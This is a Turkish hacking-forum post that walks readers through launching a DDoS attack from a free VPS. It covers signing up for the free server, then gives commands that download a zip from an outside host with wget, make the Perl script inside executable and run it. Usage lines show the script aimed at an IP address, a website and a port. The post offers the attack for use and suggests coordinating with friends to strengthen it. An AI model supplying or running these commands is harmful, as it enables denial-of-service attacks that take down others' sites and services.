Vds ile güçlü ddos saldırı scripti full anlatım (1 Viewer)

K

kr4l

loic sadece modemi yavaşlatır ve siteye girilemez yapar sadece size tabiki ama bazı ayrıcalıklar olucaktır site çok kötü ise basit bir dos saldırısı ile bile kapatılabilir bu beni ilgilendirmez tabiki ama bunları bilmenizde fayda var dos saldırısı atmaya kalkmayın arkadaşlarınızla 5 10 kişi toplanıp atmanızı tavsiye ederim fakat bu yöndede %100 site kapanacak diye bir şey yoktur . Ekstradan vereceğim bu saldırının hızı yaklaşık 1 GBtirdediğim gibi dos saldırıları ile evinizdeki 10mbiti yavaşlatıp kendinizi lamer yerine koymayınbukadar açıklama yeter bence.

----------------------------------------------------------------------------------------------------------------

Merhaba arkadaşlar uzun bir süredir üstünde çalışıyorum falan diye zırvalamıcağım aklıma 1 hafta kadar önce geldi ve bende işleme koyuldum sizlere free vds ile güçlü bir ddos saldırısı yapmayı oğreticeğim siz bu konuyu okurken ben büyük ihtimalle videosunu çekmekle uğraşıyo olucağım yani yakında videolu anlatımda olucak bence sabite alınabilecek bir konu . Neyse başlıyalım

----------------------------------------------------------------------------------------------------------------

İlk Olarak Free Vds'mizi alalım sitemiz https://koding.com/Register evet direk olarak verdiğim linkten kayıt oluyoruz NOT : EMAİLİNİZE ŞİFRE GELİCEK BUNDAN DOLAYI GERÇEK EMAİLİNİZİ YAZINIZ . Evet kayıt olduktan sonra siteye giriş yapıyoruz ardından siteyi 1 kere yenileyip bekliyoruz kısa bir süre sonra sizden doğrulama kodu isticek emailinize gelicek eğer gelmezse biraz aşşağıda tekrar gönder butonuna basınız gelince doğrulama kodunu yazın ve vds'nizin kurulmasını bekleyin

Evet Vds'mizi aldık şimdi sıra vds ile saldırı yapmaya evet kodlarımızı veriyorum

wget http://zdrawcoderscript.netau.net/zdrawcoderddos.zip
unzip zdrawcoderddos.zip
chmod 777 zdrawcoderddos.pl
./zdrawcoderddos.pl

Bu Kodları Tek Tek yazıyoruz ardından saldırı yapmaya geçiyoruz .

perl zdrawcoderddos.pl 5.231.155.240 İP ATTACK

perl zdrawcoderddos.pl saldirilacaksite.com SİTE ATTACK

perl zdrawcoderddos.pl 5.231.155.240 8080 PORT ATTACK

Users who are viewing this thread